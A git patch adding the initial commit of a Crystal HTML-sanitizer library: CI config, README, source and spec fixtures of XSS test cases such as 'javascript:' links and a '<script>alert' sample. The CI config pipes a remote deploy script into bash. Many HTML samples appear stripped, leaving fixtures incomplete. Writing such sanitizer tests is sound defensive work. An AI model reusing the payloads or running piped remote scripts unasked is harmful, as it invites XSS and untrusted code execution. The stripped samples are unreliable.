From 52d4885e2c605f2c5a0caf9f0cfe589badda4be5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Johannes=20M=C3=BCller?= Date: Wed, 20 May 2020 01:18:22 +0200 Subject: [PATCH] Initial commit --- .circleci/config.yml | 94 ++++ .editorconfig | 9 + .gitignore | 9 + LICENSE | 202 ++++++++ Makefile | 56 +++ README.md | 128 +++++ scripts/generate-docs.sh | 18 + shard.yml | 13 + spec/html_sanitizer/basic.hrx | 70 +++ spec/html_sanitizer/class.hrx | 34 ++ spec/html_sanitizer/combined_policies.hrx | 42 ++ spec/html_sanitizer/combined_policies_spec.cr | 11 + spec/html_sanitizer/default.hrx | 138 +++++ spec/html_sanitizer/html_sanitizer_spec.cr | 102 ++++ spec/html_sanitizer/img.hrx | 46 ++ spec/html_sanitizer/links.hrx | 89 ++++ .../protocol-based-javascript.hrx | 160 ++++++ spec/html_sanitizer/protocol_javascript.hrx | 67 +++ spec/html_sanitizer/url_spec.cr | 8 + spec/html_sanitizer/xss.hrx | 475 ++++++++++++++++++ spec/spec_helper.cr | 1 + spec/support/hrx.cr | 83 +++ spec/text_policy.hrx | 66 +++ spec/text_policy_spec.cr | 17 + spec/uri_sanitizer_spec.cr | 113 +++++ src/adapter/libxml2.cr | 137 +++++ src/policy.cr | 45 ++ src/policy/html_sanitizer.cr | 348 +++++++++++++ src/policy/html_sanitizer/safelist.cr | 70 +++ src/policy/text.cr | 23 + src/policy/whitelist.cr | 57 +++ src/processor.cr | 110 ++++ src/sanitize.cr | 5 + src/uri_sanitizer.cr | 91 ++++ 34 files changed, 2937 insertions(+) create mode 100644 .circleci/config.yml create mode 100644 .editorconfig create mode 100644 .gitignore create mode 100644 LICENSE create mode 100644 Makefile create mode 100644 README.md create mode 100755 scripts/generate-docs.sh create mode 100644 shard.yml create mode 100644 spec/html_sanitizer/basic.hrx create mode 100644 spec/html_sanitizer/class.hrx create mode 100644 spec/html_sanitizer/combined_policies.hrx create mode 100644 spec/html_sanitizer/combined_policies_spec.cr create mode 100644 spec/html_sanitizer/default.hrx create mode 100644 spec/html_sanitizer/html_sanitizer_spec.cr create mode 100644 spec/html_sanitizer/img.hrx create mode 100644 spec/html_sanitizer/links.hrx create mode 100644 spec/html_sanitizer/protocol-based-javascript.hrx create mode 100644 spec/html_sanitizer/protocol_javascript.hrx create mode 100644 spec/html_sanitizer/url_spec.cr create mode 100644 spec/html_sanitizer/xss.hrx create mode 100644 spec/spec_helper.cr create mode 100644 spec/support/hrx.cr create mode 100644 spec/text_policy.hrx create mode 100644 spec/text_policy_spec.cr create mode 100644 spec/uri_sanitizer_spec.cr create mode 100644 src/adapter/libxml2.cr create mode 100644 src/policy.cr create mode 100644 src/policy/html_sanitizer.cr create mode 100644 src/policy/html_sanitizer/safelist.cr create mode 100644 src/policy/text.cr create mode 100644 src/policy/whitelist.cr create mode 100644 src/processor.cr create mode 100644 src/sanitize.cr create mode 100644 src/uri_sanitizer.cr diff --git a/.circleci/config.yml b/.circleci/config.yml new file mode 100644 index 0000000..df9b752 --- /dev/null +++ b/.circleci/config.yml @@ -0,0 +1,94 @@ +version: 2 + +dry: + restore_shards_cache: &restore_shards_cache + keys: + - shards-cache-v1-{{ .Branch }}-{{ checksum "shard.yml" }} + - shards-cache-v1-{{ .Branch }} + - shards-cache-v1 + + save_shards_cache: &save_shards_cache + key: shards-cache-v1-{{ .Branch }}-{{ checksum "shard.yml" }} + paths: + - ./shards-cache + +jobs: + test: + docker: + - image: crystallang/crystal:latest + environment: + SHARDS_CACHE_PATH: ./shards-cache + steps: + - run: crystal --version + + - checkout + + - 
restore_cache: *restore_shards_cache + - run: shards + - save_cache: *save_shards_cache + + - run: make test + + - run: crystal tool format --check spec src + + deploy-docs: + docker: + - image: crystallang/crystal:latest + environment: + SHARDS_CACHE_PATH: ./shards-cache + steps: + - run: crystal --version + + - checkout + + - run: scripts/generate-docs.sh + + - run: apt update && apt install -y curl rsync + - run: + command: curl https://raw.githubusercontent.com/straight-shoota/autodeploy-docs/master/autodeploy-docs.sh | bash + environment: + GIT_COMMITTER_NAME: cirlceci + GIT_COMMITTER_EMAIL: circle@circleci.com + + test-on-nightly: + docker: + - image: crystallang/crystal:nightly + environment: + SHARDS_CACHE_PATH: ./shards-cache + steps: + - run: crystal --version + + - checkout + + - restore_cache: *restore_shards_cache + - run: shards + + - run: make test + + - run: crystal tool format --check spec src + +workflows: + version: 2 + # Run tests on every single commit + ci: + jobs: + - test + # Build and depoy docs only on master branch + - deploy-docs: + requires: + - test + filters: &master-only + branches: + only: + - master + # Run tests every night using crystal nightly + nightly: + triggers: + - schedule: + cron: "0 4 * * *" + filters: + branches: + only: + - master + jobs: + - test-on-nightly diff --git a/.editorconfig b/.editorconfig new file mode 100644 index 0000000..163eb75 --- /dev/null +++ b/.editorconfig @@ -0,0 +1,9 @@ +root = true + +[*.cr] +charset = utf-8 +end_of_line = lf +insert_final_newline = true +indent_style = space +indent_size = 2 +trim_trailing_whitespace = true diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..0bbd4a9 --- /dev/null +++ b/.gitignore @@ -0,0 +1,9 @@ +/docs/ +/lib/ +/bin/ +/.shards/ +*.dwarf + +# Libraries don't need dependency lock +# Dependencies will be locked in applications that use them +/shard.lock diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..d645695 --- /dev/null +++ b/LICENSE @@ -0,0 +1,202 @@ + + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. 
+ + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. 
You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. 
In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. 
diff --git a/Makefile b/Makefile new file mode 100644 index 0000000..b88d98d --- /dev/null +++ b/Makefile @@ -0,0 +1,56 @@ +-include Makefile.local # for optional local options + +BUILD_TARGET ::= bin/app + +# The shards command to use +SHARDS ?= shards +# The crystal command to use +CRYSTAL ?= crystal + +SRC_SOURCES ::= $(shell find src -name '*.cr' 2>/dev/null) +LIB_SOURCES ::= $(shell find lib -name '*.cr' 2>/dev/null) +SPEC_SOURCES ::= $(shell find spec -name '*.cr' 2>/dev/null) + +.PHONY: test +test: ## Run the test suite +test: lib + $(CRYSTAL) spec + +.PHONY: format +format: ## Apply source code formatting +format: $(SRC_SOURCES) $(SPEC_SOURCES) + $(CRYSTAL) tool format src spec + +docs: ## Generate API docs +docs: $(SRC_SOURCES) lib + $(CRYSTAL) docs -o docs + +lib: shard.lock + $(SHARDS) install + # Touch is necessary because `shards install` always touches shard.lock + touch lib + +shard.lock: shard.yml + $(SHARDS) update + +.PHONY: clean +clean: ## Remove application binary +clean: + @rm -f $(BUILD_TARGET) + +.PHONY: help +help: ## Show this help + @echo + @printf '\033[34mtargets:\033[0m\n' + @grep -hE '^[a-zA-Z_-]+:.*?## .*$$' $(MAKEFILE_LIST) |\ + sort |\ + awk 'BEGIN {FS = ":.*?## "}; {printf " \033[36m%-15s\033[0m %s\n", $$1, $$2}' + @echo + @printf '\033[34moptional variables:\033[0m\n' + @grep -hE '^[a-zA-Z_-]+ \?=.*?## .*$$' $(MAKEFILE_LIST) |\ + sort |\ + awk 'BEGIN {FS = " \\?=.*?## "}; {printf " \033[36m%-15s\033[0m %s\n", $$1, $$2}' + @echo + @printf '\033[34mrecipes:\033[0m\n' + @grep -hE '^##.*$$' $(MAKEFILE_LIST) |\ + awk 'BEGIN {FS = "## "}; /^## [a-zA-Z_-]/ {printf " \033[36m%s\033[0m\n", $$2}; /^## / {printf " %s\n", $$2}' diff --git a/README.md b/README.md new file mode 100644 index 0000000..fdca90d --- /dev/null +++ b/README.md @@ -0,0 +1,128 @@ +# sanitize + +`sanitize` is a Crystal library for transforming HTML/XML trees. It's primarily +used to sanitize HTML from untrusted sources in order to prevent +[XSS attacks](http://en.wikipedia.org/wiki/Cross-site_scripting) and other +adversities. + +It builds on stdlib's [`XML`](https://crystal-lang.org/api/XML.html) module to +parse HTML/XML. Based on [libxml2](http://xmlsoft.org/) it's a solid parser and +turns malformed and malicious input into valid and safe markup. + +* Code: [https://github.com/straight-shoota/sanitize](https://github.com/straight-shoota/sanitize) +* API docs: [https://straight-shoota.github.io/sanitize/api/latest/](https://straight-shoota.github.io/sanitize/api/latest/) +* Issue tracker: [https://github.com/straight-shoota/sanitize/issues](https://github.com/straight-shoota/sanitize/issues) +* Shardbox: [https://shardbox.org/shards/sanitize](https://shardbox.org/shards/sanitize) + +## Installation + +1. Add the dependency to your `shard.yml`: + + ```yaml + dependencies: + sanitize: + github: straight-shoota/sanitize + ``` + +2. Run `shards install` + +## Sanitization Features + +The `Sanitize::Policy::HTMLSanitizer` policy applies the following sanitization steps. Except +for the first one (which is essential to the entire process), all can be disabled +or configured. + +* Turns malformed and malicious HTML into valid and safe markup. +* Strips HTML elements and attributes not included in the safe list. +* Sanitizes URL attributes (like `href` or `src`) with customizable sanitization + policy. +* Adds `rel="nofollow"` to all links and `rel="noopener"` to links with `target`. +* Validates values of accepted attributes `align`, `width` and `height`. 
+* Filters `class` attributes based on a whitelist (by default all classes are + rejected). + +## Usage + +Transformation is based on rules defined by `Sanitize::Policy` implementations. + +The recommended standard policy for HTML sanitization is `Sanitize::Policy::HTMLSanitizer.common` +which represents good defaults for most use cases. +It sanitizes user input against a known safe list of accepted elements and their +attributes. + +```crystal +require "sanitize" + +sanitizer = Sanitize::Policy::HTMLSanitizer.common +sanitizer.process(%(foo)) # => %(foo) +sanitizer.process(%(

foo

)) # => %(

foo

) +sanitizer.process(%()) # => %() +sanitizer.process(%(
foobar
)) # => %(
foobar
)
+```
+
+Sanitization should always run after any other processing (for example rendering
+Markdown) and is a must when including HTML from untrusted sources into a web
+page.
+
+### With Markd
+
+A typical format for user-generated content is `Markdown`. Even though it has
+only a very limited feature set compared to HTML, it can still produce
+potentially harmful HTML and it is usually possible to embed raw HTML directly.
+So sanitization is necessary.
+
+The most common Markdown renderer is [markd](https://shardbox.org/shards/markd),
+so here is a sample of how to use it with `sanitize`:
+
+````crystal
+sanitizer = Sanitize::Policy::HTMLSanitizer.common
+# Allow classes with `language-` prefix which are used for syntax highlighting.
+sanitizer.valid_classes << /language-.+/
+
+markdown = <<-MD
+  Sanitization with [https://shardbox.org/shards/sanitize](sanitize) is not that
+  **difficult**.
+  ```cr
+  puts "Hello World!"
+  ```
+  

Hello world!

+ MD + +html = Markd.to_html(markdown) +sanitized = sanitizer.process(html) +puts sanitized +```` + +The result: + +```html +

Sanitization with https://shardbox.org/shards/sanitize is not that +difficult.

+
puts "Hello World!"
+
+

Hello world!

+``` + +## Limitations + +Sanitizing CSS is not supported. Thus `style` attributes can't be accepted in a +safe way. +CSS sanitization features may be added when a CSS parsing library is available. + +## Security + +If you want to privately disclose security-issues, please contact +[straightshoota](https://keybase.io/straightshoota) on Keybase or +[straightshoota@gmail.com](mailto:straightshoota@gmail.com) (PGP: `DF2D C9E9 FFB9 6AE0 2070 D5BC F0F3 4963 7AC5 087A`). + +## Contributing + +1. Fork it ([https://github.com/straight-shoota/sanitize/fork](https://github.com/straight-shoota/sanitize/fork)) +2. Create your feature branch (`git checkout -b my-new-feature`) +3. Commit your changes (`git commit -am 'Add some feature'`) +4. Push to the branch (`git push origin my-new-feature`) +5. Create a new Pull Request + +## Contributors + +- [Johannes Müller](https://github.com/straight-shoota) - creator and maintainer diff --git a/scripts/generate-docs.sh b/scripts/generate-docs.sh new file mode 100755 index 0000000..5dbaf34 --- /dev/null +++ b/scripts/generate-docs.sh @@ -0,0 +1,18 @@ +#! /usr/bin/env bash + +set -e + +GENERATED_DOCS_DIR="./docs" + +echo -e "Building docs into ${GENERATED_DOCS_DIR}" +echo -e "Clearing ${GENERATED_DOCS_DIR} directory" +rm -rf "${GENERATED_DOCS_DIR}" + +echo -e "Running \`make docs\`..." +make docs + +echo -e "Copying README.md" + +# "{{" and "{%"" need to be escaped, otherwise Jekyll might interpret the expressions (on Github Pages) +ESCAPE_TEMPLATE='s/{{/{{"{{"}}/g; s/{\%/{{"{%"}}/g;' +sed "${ESCAPE_TEMPLATE}" README.md > "${GENERATED_DOCS_DIR}/README.md" diff --git a/shard.yml b/shard.yml new file mode 100644 index 0000000..92498c0 --- /dev/null +++ b/shard.yml @@ -0,0 +1,13 @@ +name: sanitize +version: 0.1.0 + +authors: + - Johannes Müller + +crystal: 0.34.0 + +license: Apache-2.0 + +development_dependencies: + hrx: + github: straight-shoota/hrx diff --git a/spec/html_sanitizer/basic.hrx b/spec/html_sanitizer/basic.hrx new file mode 100644 index 0000000..e2c1047 --- /dev/null +++ b/spec/html_sanitizer/basic.hrx @@ -0,0 +1,70 @@ +<===> empty/document.html +<===> + + +<===> pending:skeleton/document.html + + + + + +<===> + + +<===> invalid/fragment.html +foo

bar

bazz
quux
+<===> invalid/common.html +foo

bar

bazz
quux
+<===> + + + +<===> invalid-div/fragment.html +foo

bar

bazz
quux
+<===> invalid-div/common.html +foo

bar

bazz quux +<===> + + +<===> basic/fragment.html +Lorem ipsum dolor sit
amet +<===> basic/common.html +Lorem ipsum dolor sit
amet +<===> + + +<===> malformed/fragment.html +Lorem dolor sit
amet +<===> malicious/common.html +Lorem ipsum dolor sit
amet <script>alert("hello world"); +<===> + + +<===> target="_blank"/fragment.html +foo +<===> target="_blank"/common.html +foo +<===> + + +<===> percent encoded URL/fragment.html +CI Status +<===> percent encoded URL/common.html +CI Status +<===> diff --git a/spec/html_sanitizer/class.hrx b/spec/html_sanitizer/class.hrx new file mode 100644 index 0000000..897c1c2 --- /dev/null +++ b/spec/html_sanitizer/class.hrx @@ -0,0 +1,34 @@ +<===> reject/fragment.html +
+<===> reject/common.html +
+<===> reject/allow-prefix.html +
+<===> + + +<===> allow-with-prefix/fragment.html +
+<===> allow-with-prefix/common.html +
+<===> allow-with-prefix/allow-prefix.html +
+<===> + + +<===> reject-non-prefix/fragment.html +
+<===> reject-non-prefix/common.html +
+<===> reject-non-prefix/allow-prefix.html +
+<===> + + +<===> allow-explicit/fragment.html +
+<===> allow-explicit/common.html +
+<===> allow-explicit/allow-prefix.html +
+<===> diff --git a/spec/html_sanitizer/combined_policies.hrx b/spec/html_sanitizer/combined_policies.hrx new file mode 100644 index 0000000..b648ae6 --- /dev/null +++ b/spec/html_sanitizer/combined_policies.hrx @@ -0,0 +1,42 @@ +<===> basic/fragment.html +Lorem ipsum dolor sit
amet +<===> basic/text.html +Lorem ipsum dolor sit amet +<===> basic/inline.html +Lorem ipsum dolor sit amet +<===> basic/common.html +Lorem ipsum dolor sit
amet +<===> + + +<===> malformed/fragment.html +Lorem dolor sit
amet +<===> malicious/text.html +Lorem ipsum dolor sit amet <script>alert("hello world"); +<===> malicious/inline.html +Lorem ipsum dolor sit amet <script>alert("hello world"); +<===> malicious/common.html +Lorem ipsum dolor sit
amet <script>alert("hello world"); +<===> diff --git a/spec/html_sanitizer/combined_policies_spec.cr b/spec/html_sanitizer/combined_policies_spec.cr new file mode 100644 index 0000000..5751fba --- /dev/null +++ b/spec/html_sanitizer/combined_policies_spec.cr @@ -0,0 +1,11 @@ +require "../support/hrx" +require "../../src/processor" +require "../../src/policy/html_sanitizer" +require "../../src/policy/text" + +run_hrx_samples Path["./combined_policies.hrx"], { + "text" => Sanitize::Policy::Text.new, + "inline" => Sanitize::Policy::HTMLSanitizer.inline.no_links, + "basic" => Sanitize::Policy::HTMLSanitizer.basic, + "common" => Sanitize::Policy::HTMLSanitizer.common, +} diff --git a/spec/html_sanitizer/default.hrx b/spec/html_sanitizer/default.hrx new file mode 100644 index 0000000..627adb8 --- /dev/null +++ b/spec/html_sanitizer/default.hrx @@ -0,0 +1,138 @@ +<===> invalid/fragment.html +foo

bar

bazz
quux
+<===> invalid/stripped.html +foo

bar

bazz
quux
+<===> invalid/escaped.html +<invalid>foo<p>bar</p>bazz</invalid>
quux
+<===> invalid/pruned.html +
quux
+<===> + + +<===> bad_argument/fragment.html +
foo
+<===> bad_argument/stripped.html +
foo
+<===> + +<==> whitewash/fragment.html +no
foo
bar +<==> whitewash/pruned.html +
foo
+<==> + + +<===> nofollow/fragment.html +Click here +<===> nofollow/stripped.html +Click here +<===> + + +<===> nofollow-rel/fragment.html +Click here +<===> nofollow-rel/stripped.html +Click here +<===> + + +<===> unprintable/fragment.html +Lo\u2029ofah ro\u2028cks! +<===> unprintable/stripped.html +Loofah rocks! +<===> + + +<===> msword/fragment.html + + +

Foo BOLD

+<===> msword/stripped.html + + +

Foo BOLD

+<===> + + +<===> entities/fragment.html +

foo bar

+<===> + + +<===> align/fragment.html +

foo

+<===> + + +<===> align-empty/fragment.html +

foo

+<===> align-empty/common.html +

foo

+<===> + + +<===> align-invalid/fragment.html +

foo

+<===> align-invalid/common.html +

foo

+<===> diff --git a/spec/html_sanitizer/html_sanitizer_spec.cr b/spec/html_sanitizer/html_sanitizer_spec.cr new file mode 100644 index 0000000..f70a965 --- /dev/null +++ b/spec/html_sanitizer/html_sanitizer_spec.cr @@ -0,0 +1,102 @@ +require "../support/hrx" +require "../../src/policy/html_sanitizer" + +describe Sanitize::Policy::HTMLSanitizer do + it "removes invalid element" do + Sanitize::Policy::HTMLSanitizer.common.process("

foobar

").should eq "

foobar

" + end + + it "inserts whitespace for removed block tag" do + Sanitize::Policy::HTMLSanitizer.common.process("

foo

bar
baz

").should eq "

foo bar baz

" + end + + it "strips tag with invalid URL attribute" do + Sanitize::Policy::HTMLSanitizer.common.process(%()).should eq %() + Sanitize::Policy::HTMLSanitizer.common.process(%(foo)).should eq "foo" + end + + it "escapes URL attribute" do + Sanitize::Policy::HTMLSanitizer.common.process(%()).should eq %() + end + + it %(adds rel="noopener" on target="_blank") do + policy = Sanitize::Policy::HTMLSanitizer.common + policy.process(%(foo)).should eq(%(foo)) + policy.accepted_attributes["a"] << "target" + policy.process(%(foo)).should eq(%(foo)) + end + + it "doesn't leak configuration" do + policy = Sanitize::Policy::HTMLSanitizer.common + policy.accepted_attributes["p"] << "invalid" + policy.process(%(

bar

)).should eq(%(

bar

)) + Sanitize::Policy::HTMLSanitizer.common.process(%(

bar

)).should eq(%(

bar

)) + end + + describe "html scaffold" do + it "fragment" do + Sanitize::Policy::HTMLSanitizer.common.process("FOO

BAR

").should eq "FOO

BAR

" + end + + it "document" do + sanitizer = Sanitize::Policy::HTMLSanitizer.common + sanitizer.accept_tag("html") + sanitizer.accept_tag("head") + sanitizer.accept_tag("body") + sanitizer.process_document("FOO

BAR

").should eq "FOO

BAR

\n" + end + end + + describe "#transform_classes" do + it "strips classes by default" do + policy = Sanitize::Policy::HTMLSanitizer.inline + orig_attributes = {"class" => "foo bar baz"} + attributes = orig_attributes.clone + policy.transform_classes("div", attributes) + attributes.should eq Hash(String, String).new + end + + it "accepts classes" do + policy = Sanitize::Policy::HTMLSanitizer.inline + orig_attributes = {"class" => "foo bar baz"} + attributes = orig_attributes.clone + + policy.valid_classes << /fo*/ + policy.valid_classes << "bar" + policy.transform_classes("div", attributes) + attributes.should eq({"class" => "foo bar"}) + end + + it "only matches full class name" do + policy = Sanitize::Policy::HTMLSanitizer.inline + orig_attributes = {"class" => "foobar barfoo barfoobaz foo fom"} + attributes = orig_attributes.clone + + policy.valid_classes << /fo./ + policy.transform_classes("div", attributes) + attributes.should eq({"class" => "foo fom"}) + end + end + + run_hrx_samples Path["basic.hrx"], { + "common" => Sanitize::Policy::HTMLSanitizer.common, + } + run_hrx_samples Path["protocol_javascript.hrx"], { + "common" => Sanitize::Policy::HTMLSanitizer.common, + } + run_hrx_samples Path["links.hrx"], { + "common" => Sanitize::Policy::HTMLSanitizer.common, + } + run_hrx_samples Path["xss.hrx"], { + "common" => Sanitize::Policy::HTMLSanitizer.common, + } + run_hrx_samples Path["img.hrx"], { + "common" => Sanitize::Policy::HTMLSanitizer.common, + } + run_hrx_samples Path["class.hrx"], { + "common" => Sanitize::Policy::HTMLSanitizer.common, + "allow-prefix" => Sanitize::Policy::HTMLSanitizer.common.tap { |sanitizer| + sanitizer.valid_classes = Set{/allowed-.+/, "explicitly-allowed"} + }, + } +end diff --git a/spec/html_sanitizer/img.hrx b/spec/html_sanitizer/img.hrx new file mode 100644 index 0000000..1fd81d0 --- /dev/null +++ b/spec/html_sanitizer/img.hrx @@ -0,0 +1,46 @@ +<===> img/fragment.html + +<===> + + +<===> img with width/fragment.html + +<===> + + +<===> img with height/fragment.html + +<===> + + +<===> img with width and height/fragment.html + +<===> + + +<===> img invalid height/fragment.html + +<===> img invalid height/common.html + +<===> + + +<===> img invalid width/fragment.html + +<===> img invalid width/common.html + +<===> + + + +<===> img invalid width and height/fragment.html + +<===> img invalid width and height/common.html + +<===> + + + +<===> img percent width and height/fragment.html + +<===> diff --git a/spec/html_sanitizer/links.hrx b/spec/html_sanitizer/links.hrx new file mode 100644 index 0000000..1047408 --- /dev/null +++ b/spec/html_sanitizer/links.hrx @@ -0,0 +1,89 @@ +<===> links/1/fragment.html + +<===> links/1/common.html + +<===> + + +<===> links/2/fragment.html + +<===> links/2/common.html + +<===> + + +<===> links/3/fragment.html + +<===> links/3/common.html + +<===> + + +<===> links/4/fragment.html + +<===> links/4/common.html + +<===> + + +<===> links/5/fragment.html + +<===> links/5/common.html + +<===> + + +<===> links/6/fragment.html + +<===> links/6/common.html + +<===> + + +<===> links/7/fragment.html + +<===> links/7/common.html + +<===> + + +<===> links/8/fragment.html + +<===> links/8/common.html + +<===> + + +<===> links/9/fragment.html + +<===> links/9/common.html + +<===> + + +<===> links/10/fragment.html + +<===> links/10/common.html + +<===> + + +<===> links/11/fragment.html +Red dot +<===> links/11/common.html +Red dot +<===> + + +<===> links/12/fragment.html + +<===> links/12/common.html + +<===> + + +<===> 
links/13/fragment.html + +<===> links/13/common.html + +<===> diff --git a/spec/html_sanitizer/protocol-based-javascript.hrx b/spec/html_sanitizer/protocol-based-javascript.hrx new file mode 100644 index 0000000..16576ea --- /dev/null +++ b/spec/html_sanitizer/protocol-based-javascript.hrx @@ -0,0 +1,160 @@ + +<===> simple, no spaces/fragment.html +foo +<===> simple, no spaces/common.html +foo +<===> simple, no spaces/restricted.html +foo +<===> simple, no spaces/basic.html +foo +<===> simple, no spaces/relaxed.html +foo + +<===> simple, spaces before/fragment.html +foo +<===> simple, spaces before/common.html +foo +<===> simple, spaces before/restricted.html +foo +<===> simple, spaces before/basic.html +foo +<===> simple, spaces before/relaxed.html +foo + +<===> simple, spaces after/fragment.html +foo +<===> simple, spaces after/common.html +foo +<===> simple, spaces after/restricted.html +foo +<===> simple, spaces after/basic.html +foo +<===> simple, spaces after/relaxed.html +foo + +<===> simple, spaces before and after/fragment.html +foo +<===> simple, spaces before and after/common.html +foo +<===> simple, spaces before and after/restricted.html +foo +<===> simple, spaces before and after/basic.html +foo +<===> simple, spaces before and after/relaxed.html +foo + +<===> preceding colon/fragment.html +foo +<===> preceding colon/common.html +foo +<===> preceding colon/restricted.html +foo +<===> preceding colon/basic.html +foo +<===> preceding colon/relaxed.html +foo + +<===> UTF-8 encoding/fragment.html +foo +<===> UTF-8 encoding/common.html +foo +<===> UTF-8 encoding/restricted.html +foo +<===> UTF-8 encoding/basic.html +foo +<===> UTF-8 encoding/relaxed.html +foo + +<===> long UTF-8 encoding/fragment.html +foo +<===> long 